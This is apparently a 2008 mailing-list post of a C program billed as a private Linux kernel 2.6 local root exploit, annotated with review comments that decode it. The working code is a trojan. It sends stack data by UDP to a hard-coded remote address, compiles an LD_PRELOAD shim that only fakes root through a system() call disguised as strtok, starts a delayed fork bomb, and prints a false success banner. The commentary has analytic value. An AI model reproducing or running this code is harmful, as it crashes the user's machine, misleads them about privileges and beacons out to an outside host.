0day LINUX 0day LATEST
From: "wejwklekl246" <sidjwioeupo () mail md>
Date: Mon, 28 Jan 2008 10:13:38 +0000
/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
 *
 * afunixroot.c Linux kernel 2.6.x i386 local root exploit
 *
 * Tested under:
 *
 * Redhat 7.0
 * Redhat 7.1
 * Redhat 7.2
 * Redhat 7.3
 * Redhat 8.0
 * Redhat 9.0
 * should also work on SuSE <= 10.2
 * Debian 3.0 (credit to Henrique)
 * GhostLord tested also Mandrake 9.0, vuln.
 *
 * rumours go around that it could work on FreeBSD too
 * (with minor changes).
 *
 */

/*
 * NOTE(review): nothing in this file touches a kernel bug; the hex
 * literals hide what it really does. Decoded, the program:
 *   1. prepare(): syscall 102 is __NR_socketcall on i386. Call 1
 *      (socket) opens an AF_INET/SOCK_DGRAM socket and call 11 (sendto)
 *      sends the 64-byte stack buffer, nine times, to the sockaddr_in
 *      packed into buf[8..9] -- a UDP beacon to a fixed remote address
 *      (decoded at the assignment below).
 *   2. Writes a tiny C file to /tmp/own.c that defines getuid/geteuid/
 *      getgid/getegid returning 0, compiles it to /tmp/own.so via
 *      system(), then execs /bin/sh with LD_PRELOAD pointing at it.
 *      The shell merely reports uid 0; no privilege changes.
 *   3. A forked child pauses 15 seconds, then forks and mallocs in an
 *      endless loop (fork bomb) in every descendant.
 * The "Success!!!" line reports the return value of nice(16), not of
 * any privilege escalation.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/syscall.h>

/* Every strtok() call below is really system(). */
#undef strtok
#define strtok system

/* 102 is __NR_socketcall on i386; there is no "ldt control" syscall. */
#define __NR_sys_ldtctrl 102

/* Not shellcode. The concatenated hex decodes to the C source of the
 * LD_PRELOAD shim:
 *   int getuid() { return 0; }
 *   int geteuid() { return 0; }
 *   int getgid() { return 0; }
 *   int getegid() { return 0; }
 * followed by a NUL ("\x0") and a decoy "/bin/sh" suffix that
 * fprintf("%s") never reaches. */
static char hellc0de[] =
"\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
"\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
"\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
"\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
"\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
"\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
"\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";

/* Set by the SIGALRM handler; only read for its side effect of
 * waking the child out of pause(). */
static int done=0;

/* SIGALRM handler: bumps the counter so the pause() below returns. */
void handler(int v) { done++; }

/* _syscall2() is the old <asm/unistd.h> macro that expands to a user-space
 * wrapper `int sys_ldtctrl(int c, int *a)` issuing int 0x80 with
 * eax = __NR_sys_ldtctrl (102 = socketcall). Current kernel headers no
 * longer provide the macro, so this line does not build there. */
inline _syscall2(int, sys_ldtctrl, int, c, int *, a);

/* Beacon: open a UDP socket and send the contents of this stack buffer
 * (fd, pointers, sockaddr) to a hard-coded remote address, nine times.
 * Nothing here prepares an exploit; return values are never checked. */
void prepare() {
    int key, r, n_cnt=8;
    int buf[16];                   /* 64 bytes on i386; also the payload */
    memset(buf, 0, sizeof(buf));   /* <string.h> is not included: implicit declaration */
    buf[0]=buf[1]=2;               /* socket(AF_INET=2, SOCK_DGRAM=2, 0) */
    key = sys_ldtctrl(1, buf);     /* socketcall(SYS_SOCKET=1) -> socket fd */
retry:
    memset(buf, 0, sizeof(buf));
    /* socketcall(SYS_SENDTO) argument array: fd, buf, len, flags, addr, addrlen */
    buf[0] = key;                  /* fd */
    buf[1] = (int)buf;             /* payload = this very array */
    buf[2] = 64;                   /* len = sizeof(buf); flags stay buf[3] = 0 */
    buf[4] = (int)&buf[8];         /* (struct sockaddr *)&buf[8] */
    buf[5] = 16;                   /* sizeof(struct sockaddr_in) */
    buf[8] = 0x60030002;           /* little-endian bytes 02 00 03 60: sin_family=AF_INET, sin_port=0x0360 (864) */
    buf[9] = 0x1d5b49d5;           /* little-endian bytes d5 49 5b 1d: sin_addr 213.73.91.29 */
    r = sys_ldtctrl(11, buf);      /* socketcall(SYS_SENDTO=11); r is never used */
    if(n_cnt--) goto retry;        /* 8 retries after the first send: 9 datagrams total */
}

/* Entry point: beacon, build the LD_PRELOAD shim, fork a delayed fork
 * bomb, then exec a shell that only pretends to be root. */
int main(void) {
    FILE *fp;
    char *offset, *token;
    int ret=1;
    prepare();                     /* network beacon before anything visible happens */
    /* "/tmp/own.c"; fopen() result is not checked before use */
    fp=fopen("\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00","w");
    fprintf(fp,"%s",hellc0de);
    fclose(fp);
    /* strtok is #defined to system(): runs
     * "gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c".
     * token is never used afterwards. */
    token = (void*)strtok("\x67\x63\x63\x20\x2d\x73\x68\x61\x72\x65\x64\x20\x2d\x6f\x20\x2f\x74\x6d"
                          "\x70\x2f\x6f\x77\x6e\x2e\x73\x6f\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e"
                          "\x63\x3b\x72\x6d\x20\x2d\x66\x20\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x2e\x63\x00");
    /* int 0x80 with eax=0x22 (34 = __NR_nice), ebx=0x10: nice(16).
     * nice() returns 0 on success, so ret becomes 0 and the banner
     * prints no matter what privileges the process has. ebx is
     * clobbered without being declared. */
    __asm__(
        "xorl %%eax, %%eax \n"
        "movl $0x10, %%ebx \n"
        "movb $0x22, %%al \n"
        "int $0x80 \n"
        :"=&a"(ret)
    );
    if(!ret) printf("\nSuccess!!!\nEnjoy...\n\n");
    if (fork() == 0) {
        signal(SIGALRM, handler);
        alarm(15);                 /* delay so the fake shell is already open */
        /* eax=29 = __NR_pause: block until SIGALRM fires */
        __asm__(
            "xorl %eax, %eax \n"
            "movb $29, %al \n"
            "int $0x80 \n"
        );
        /* Fork bomb: eax=2 = __NR_fork; parent and child both stay in
         * the loop, and each iteration leaks a malloc() as well. */
        while(1) {
            __asm__(
                "xorl %eax, %eax \n"
                "movb $0x02, %al \n"
                "int $0x80 \n"
            );
            offset=malloc(sizeof(hellc0de)+16);     /* never freed */
            *((int *)hellc0de) = (unsigned)offset;  /* scribbles a pointer over hellc0de; file already written */
        }
        exit(0);                   /* unreachable */
    }
    /* "LD_PRELOAD=/tmp/own.so": the shim makes getuid() & friends lie */
    putenv("\x4c\x44\x5f\x50\x52\x45\x4c\x4f\x41\x44\x3d\x2f\x74\x6d\x70\x2f"
           "\x6f\x77\x6e\x2e\x73\x6f\x00");
    execl("/bin/sh", "sh", NULL);  /* real uid/gid unchanged; the child above keeps running */
    return 0;
}
/* -EOF- */